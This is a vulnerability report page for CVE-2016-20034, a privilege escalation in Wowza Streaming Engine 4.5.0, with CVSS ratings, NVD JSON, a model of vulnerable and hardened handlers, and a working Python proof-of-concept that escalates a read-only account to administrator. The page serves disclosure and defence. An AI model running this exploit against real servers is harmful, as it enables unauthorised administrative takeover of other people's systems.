Security Vulnerability Report
CVE-2016-20034 CVSS 8.8 HIGH

CVE-2016-20034

Published: 2026-03-16 14:17:51
Last Modified: 2026-03-19 14:16:48

Description

Wowza Streaming Engine 4.5.0 contains a privilege escalation vulnerability that allows an authenticated read-only user to elevate their privileges to administrator by manipulating POST parameters. The user edit endpoint applies the privilege fields supplied in the request body without checking that the caller is allowed to change them, so a low-privilege user who sends a POST request with accessLevel set to 'admin' and the advUser parameter set to both 'true' and 'on' gains administrative access to the Streaming Engine Manager.
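The root cause described above is the server trusting client-supplied privilege fields. The following Python model is an added illustration, not Wowza's code and not the PoC from this page: a vulnerable handler that copies accessLevel and advUser straight from the form body, beside a hardened handler that requires a session-bound CSRF token (relevant because the record classifies the weakness as CWE-352) and lets only an admin session touch privilege fields. The user store, session identifiers, the csrfToken field name and the handler signatures are assumptions made for the model.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs

# Constructed user store for the demonstration (an assumption, not a Wowza data format).
USERS = {
    "admin": {"accessLevel": "admin", "advUser": True},
    "viewer": {"accessLevel": "read-only", "advUser": False},
}

# Per-process secret for the CSRF token MAC; part of the model, not of the product.
CSRF_KEY = secrets.token_bytes(32)


def fresh_users():
    """Independent copy of the constructed store so each run starts clean."""
    return {name: dict(rec) for name, rec in USERS.items()}


def csrf_token(session_id: str) -> str:
    """Token bound to the session, so a form on a third-party site cannot supply it."""
    return hmac.new(CSRF_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def _truthy(values) -> bool:
    """The PoC sends advUser twice ('true' and 'on'); parse_qs keeps both values."""
    return any(v.lower() in ("true", "on", "1") for v in values)


def vulnerable_user_edit(session_user, body, users=None):
    """Models the flaw: whoever is logged in may set accessLevel/advUser on any user."""
    users = USERS if users is None else users
    form = parse_qs(body, keep_blank_values=True)
    target = form.get("username", [session_user])[0]
    record = users.setdefault(target, {"accessLevel": "read-only", "advUser": False})
    if "accessLevel" in form:
        record["accessLevel"] = form["accessLevel"][0]  # client-controlled privilege
    if "advUser" in form:
        record["advUser"] = _truthy(form["advUser"])
    return record


def hardened_user_edit(session_user, session_id, body, users=None):
    """Server-side decision: valid CSRF token, and only an admin may change privilege fields."""
    users = USERS if users is None else users
    form = parse_qs(body, keep_blank_values=True)
    token = form.get("csrfToken", [""])[0]
    if not hmac.compare_digest(token, csrf_token(session_id)):
        raise PermissionError("missing or invalid CSRF token")
    caller = users.get(session_user)
    if caller is None:
        raise PermissionError("unknown session user")
    target = form.get("username", [session_user])[0]
    privileged = {"accessLevel", "advUser"} & set(form)
    if privileged and caller["accessLevel"] != "admin":
        raise PermissionError(f"{session_user} may not change {sorted(privileged)}")
    record = users.setdefault(target, {"accessLevel": "read-only", "advUser": False})
    if "accessLevel" in form:
        level = form["accessLevel"][0]
        if level not in ("admin", "read-only"):
            raise ValueError(f"unknown accessLevel {level!r}")
        record["accessLevel"] = level
    if "advUser" in form:
        record["advUser"] = _truthy(form["advUser"])
    return record


if __name__ == "__main__":
    body = "username=viewer&accessLevel=admin&advUser=true&advUser=on"
    print("vulnerable handler:", vulnerable_user_edit("viewer", body, fresh_users()))
    try:
        hardened_user_edit("viewer", "sess-viewer", body + "&csrfToken=" + csrf_token("sess-viewer"), fresh_users())
    except PermissionError as exc:
        print("hardened handler:", exc)
```

The hardened version decides the caller's rights from the server-side session record, never from the request, and rejects the request before any field is written; the repeated advUser parameter is handled explicitly rather than by whichever value happens to win in a naive parser.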

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-352 (Cross-Site Request Forgery)

The 8.8 score shown above is the secondary CVSS v3.1 rating in the NVD record. The NVD primary CVSS v3.1 rating is 8.0 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H), which assumes the request must be triggered through user interaction, consistent with the CWE-352 classification. The secondary source also supplies a CVSS v4.0 score of 8.7 HIGH. Under either vector the attacker needs only a low-privilege (read-only) account, and the resulting impact on confidentiality, integrity and availability of the affected host is rated high.

Configurations (Affected Products)

cpe:2.3:a:wowza:streaming_engine:4.5.0:*:*:*:*:*:*:* - VULNERABLE
Wowza Streaming Engine 4.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2016-20034 PoC - Wowza Streaming Engine Privilege Escalation
# Target: Wowza Streaming Engine 4.5.0
# Vulnerability: Authenticated read-only users can escalate privileges to admin


def exploit_privilege_escalation(target_url, username, password):
    """
    Exploit privilege escalation vulnerability in Wowza Streaming Engine
    by manipulating POST parameters to gain admin access.

    Args:
        target_url: Base URL of Wowza Streaming Engine admin panel
        username: Valid read-only user account
        password: Password for the user account

    Returns:
        bool: True if exploitation successful, False otherwise
    """
    session = requests.Session()

    # Step 1: Authenticate with read-only credentials
    login_url = f"{target_url}/enginemanager/API/login"
    login_data = {"username": username, "password": password}

    try:
        login_response = session.post(login_url, data=login_data, timeout=10)
        if login_response.status_code != 200:
            print(f"[-] Authentication failed with status code: {login_response.status_code}")
            return False
        print("[+] Successfully authenticated with read-only user")

        # Step 2: Exploit privilege escalation via user edit endpoint
        # Set accessLevel to 'admin' and send advUser twice, as 'true' and 'on',
        # matching the advisory description. A list of tuples makes requests
        # emit the repeated parameter; a dict would keep only one value.
        user_edit_url = f"{target_url}/enginemanager/API/user/edit"
        exploit_data = [
            ("username", username),  # Target user's own account or other users
            ("accessLevel", "admin"),
            ("advUser", "true"),
            ("advUser", "on"),
        ]
        exploit_response = session.post(user_edit_url, data=exploit_data, timeout=10)
        # A 200 response only shows the request was accepted; confirm the new
        # access level through the Manager UI before relying on this result.
        if exploit_response.status_code == 200:
            print("[+] Privilege escalation successful!")
            print("[+] User now has administrator privileges")
            return True
        print(f"[-] Exploitation failed with status code: {exploit_response.status_code}")
        return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {str(e)}")
        return False


if __name__ == "__main__":
    # Three arguments are expected after the script name (argv has four entries).
    if len(sys.argv) != 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        print(f"Example: python {sys.argv[0]} http://target.com:8080 readonlyuser password")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    print("[*] CVE-2016-20034 - Wowza Streaming Engine Privilege Escalation")
    print(f"[*] Target: {target}")
    print(f"[*] Credentials: {user}:{pwd}")
    exploit_privilege_escalation(target, user, pwd)

References

http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5340.php (Exploit, Third Party Advisory)
https://www.exploit-db.com/exploits/40133 (Exploit, Third Party Advisory, VDB Entry)
https://www.vulncheck.com/advisories/wowza-streaming-engine-privilege-escalation-via-user-edit (Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2016-20034",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-16T14:17:50.507",
    "lastModified": "2026-03-19T14:16:48.250",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Wowza Streaming Engine 4.5.0 contains a privilege escalation vulnerability that allows authenticated read-only users to elevate privileges to administrator by manipulating POST parameters. Attackers can send POST requests to the user edit endpoint with accessLevel set to 'admin' and advUser parameters set to 'true' and 'on' to gain administrative access."
      },
      {
        "lang": "es",
        "value": "Wowza Streaming Engine 4.5.0 contiene una vulnerabilidad de escalada de privilegios que permite a usuarios autenticados de solo lectura elevar privilegios a administrador manipulando parámetros POST. Los atacantes pueden enviar solicitudes POST al endpoint de edición de usuario con accessLevel establecido en 'admin' y los parámetros advUser establecidos en 'true' y 'on' para obtener acceso administrativo."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 8.7,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH",
            "vulnAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H",
            "baseScore": 8.0,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-352"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:wowza:streaming_engine:4.5.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "FDC6B630-F0E9-4F80-8EF2-112FAB0A46C2"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5340.php",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://www.exploit-db.com/exploits/40133",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]
      },
      {
        "url": "https://www.vulncheck.com/advisories/wowza-streaming-engine-privilege-escalation-via-user-edit",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}